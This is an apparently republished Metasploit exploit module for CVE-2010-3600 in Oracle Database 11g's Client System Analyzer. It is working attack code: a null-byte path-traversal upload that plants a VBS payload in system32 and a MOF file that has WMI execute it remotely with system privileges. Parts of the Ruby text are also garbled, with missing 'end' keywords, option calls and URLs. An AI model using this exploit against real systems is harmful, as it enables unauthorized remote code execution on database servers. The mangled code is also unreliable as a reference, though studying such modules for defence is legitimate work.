Oracle Database Client System Analyzer - Arbitrary File Upload (Metasploit)

Related Vulnerabilities: CVE-2010-3600  
Publish Date: 15 Nov 2012
Author: Metasploit

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern => [ /Oracle Containers for J2EE/ ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE
	include Msf::Exploit::WbemExec

	def initialize(info = {})
			'Name'           => 'Oracle Database Client System Analyzer Arbitrary File Upload',
			'Description'    => %q{
					This module exploits an arbitrary file upload vulnerability on the Client
				Analyzer component as included in Oracle Database 11g, which allows remote
				attackers to upload and execute arbitrary code. This module has been tested
				successfully on Oracle Database 11g on Windows 2003 SP2, where execution
				through the Windows Management Instrumentation service has been used.
			'Author'         =>
					'1c239c43f521145fa8385d64a9c32243', # Vulnerability discovery
					'juan vazquez' # Metasploit module
			'License'        => MSF_LICENSE,
			'Platform'       => [ 'win' ],
			'Privileged'     => true,
			'References'     =>
					[ 'CVE', '2010-3600' ],
					[ 'OSVDB', '70546'],
					[ 'BID', '45883'],
					[ 'URL', '' ],
					[ 'URL', '' ]
			'Targets'        =>
					[ 'Oracle Oracle11g / Windows 2003 SP2', {} ]
			'DefaultTarget'  => 0,
			'DisclosureDate' => 'Jan 18 2011'

				Opt::RPORT(1158),'SSL', [true, 'Use SSL', true]),'DEPTH', [true, 'Traversal depth to reach the root', 13])
			], self.class )

	def on_new_session(client)

		return if not @var_mof_name
		return if not @var_vbs_name

		vbs_path = "C:\\windows\\system32\\#{@var_vbs_name}.vbs"
		mof_path = "C:\\windows\\system32\\wbem\\mof\\good\\#{@var_mof_name}.mof"

		if client.type != "meterpreter"
			print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
			print_error("The vbs payload (#{vbs_path}) and mof file (#{mof_path}) must be removed manually.")

		# stdapi must be loaded before we can use fs.file
		client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")

		attrib_path = "C:\\windows\\system32\\attrib.exe -r "

		cmd = attrib_path + mof_path

		client.sys.process.execute(cmd, nil, {'Hidden' => true })

			print_warning("Deleting the vbs payload \"#{@var_vbs_name}.vbs\" ...")
			print_warning("Deleting the mof file \"#{@var_mof_name}.mof\" ...")
		rescue ::Exception => e
			print_error("Exception: #{e.inspect}")


	def upload_file(data)
		res = send_request_cgi(
				'uri'     => '/em/ecm/csa/v10103/CSAr.jsp',
				'method'  => 'POST',
				'data'    => data

		return res

	def check

		file_name = rand_text_alpha(rand(5)+5)
		file_contents = rand_text_alpha(rand(20)+20)

		data = "sessionID=#{file_name}.txt\x00.xml"
		data << "\x0d\x0a"
		data << Rex::Text.uri_encode(file_contents)

		print_status("Uploading the CSA#{file_name}.txt file")
		res = upload_file(data)
		if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
			print_error("The test file could not be uploaded")
			return Exploit::CheckCode::Safe

		print_status("Checking uploaded contents...")
		res = send_request_raw({'uri' => "/em/CSA#{file_name}.txt"})

		if res and res.code == 200 and res.body =~ /#{file_contents}/
			return Exploit::CheckCode::Vulnerable

		return Exploit::CheckCode::Appears


	def exploit

		# In order to save binary data to the file system the payload is written to a .vbs
		# file and execute it from there.
		@var_mof_name = rand_text_alpha(rand(5)+5)
		@var_vbs_name = rand_text_alpha(rand(5)+5)

		print_status("Encoding payload into vbs...")
		# Only 100KB can be uploaded by default, because of this "to_win32pe_old" is used,
		# the "new" template is too big in this case.
		exe = Msf::Util::EXE.to_win32pe_old(framework, payload.encoded)
		# The payload is embedded in a vbs and executed from there to avoid badchars that
		# URLDecoder.decode (jsp) is unable to decode correctly such as 0x81, 0x8d, 0x8f,
		# 0x90 and 0x9d
		vbs = Msf::Util::EXE.to_exe_vbs(exe)

		print_status("Generating mof file...")
		mof_content = generate_mof("#{@var_mof_name}.mof", "#{@var_vbs_name}.vbs")

		traversal = "..\\" * datastore['DEPTH']
		data = "sessionID=#{traversal}\\WINDOWS\\system32\\#{@var_vbs_name}.vbs\x00.xml"
		data << "\x0d\x0a"
		# The data to upload must be uri encoded because the vulnerable jsp will use
		# URLDecoder.decode on it before writting to file.
		data << Rex::Text.uri_encode(vbs)
		print_status("Uploading the payload into the VBS to c:\\WINDOWS\\system32\\#{@var_vbs_name}.vbs...")
		res = upload_file(data)
		if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
			fail_with(Exploit::Failure::Unknown, 'VBS upload failed')

		data = "sessionID=#{traversal}WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof\x00.xml"
		data << "\x0d\x0a"
		data << Rex::Text.uri_encode(mof_content)
		print_status("Uploading the mof file to c:\\WINDOWS\\system32\\wbem\\mof\\#{@var_mof_name}.mof...")
		res = upload_file(data)
		if not res or res.code != 200 or (res.body !~ /posted data was written to placeholder file/ and res.body !~ /csaPostStatus=0/)
			fail_with(Exploit::Failure::Unknown, 'MOF upload failed')
